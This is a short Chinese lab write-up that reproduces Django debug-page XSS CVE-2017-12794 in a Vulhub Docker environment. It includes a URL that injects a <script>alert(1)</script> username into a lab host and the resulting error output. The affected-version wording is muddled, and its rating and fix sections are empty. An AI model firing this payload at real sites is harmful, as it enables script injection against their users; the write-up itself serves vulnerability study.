【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)

过期的秋刀鱼-2023-11-05 14:46

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明 内容
漏洞编号 CVE-2017-12794
漏洞名称 Django_debug page_XSS漏洞
漏洞评级
影响范围 1.11.5版本
漏洞描述
修复方案

1.1、漏洞描述

1.11.5版本,修复了500页面中存在的一个XSS漏洞

1.2、漏洞等级

1.3、影响版本

Django 1.11.5版本

1.4、漏洞复现

1、基础环境

Path:Vulhub/django/CVE-2017-12794

启动测试环境:

bash 复制代码 
sudo docker-compose up -d

访问http://your-ip:8000/即可看到

2、漏洞分析

vulhub

3、漏洞验证
复制代码 
http://192.168.8.8:8000/create_user/?username=%3Cscript%3Ealert(1)%3C/script%3E

用户已经被 创建

再次刷新页面触发XSS

抛出异常

python 复制代码 
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.
相关推荐
weixin_580614001 天前
如何提取SQL日期中的年份_使用YEAR或EXTRACT函数
jvm·数据库·python
2301_813599551 天前
SQL生产环境规范_数据库使用最佳实践
jvm·数据库·python
李可以量化1 天前
QMT 量化实战:用 Python 实现线性回归通道,精准识别趋势中的支撑与压力(下)
python·qmt·量化 qmt ptrade
a9511416421 天前
Go 中通过 channel 传递切片时的数据竞争与深拷贝解决方案
jvm·数据库·python
Dxy12393102161 天前
Python 使用正则表达式将多个空格替换为一个空格
开发语言·python·正则表达式
qq_189807031 天前
如何修改RAC数据库名_NID工具在集群环境下的改名步骤
jvm·数据库·python
zhangchaoxies1 天前
如何检测SQL注入风险_利用模糊测试技术发现漏洞
jvm·数据库·python
Luca_kill1 天前
MCP数据采集革命:从传统爬虫到智能代理的技术进化
爬虫·python·ai·数据采集·mcp·webscraping·集蜂云
zhangchaoxies1 天前
CSS如何实现响应式弹性网格布局_配合media query修改flex-wrap属性
jvm·数据库·python
ZC跨境爬虫1 天前
Scrapy分布式爬虫(单机模拟多节点):豆瓣Top250项目设置与数据流全解析
分布式·爬虫·python·scrapy
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析05GPT-6发布日深度解析-Symphony架构200万Token实战06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07从零部署 Hermes Agent:一只"会成长的 AI 马"保姆级安装教程08一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛09从限购到畅通:GLM-5.1 Coding Plan接入攻略10基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南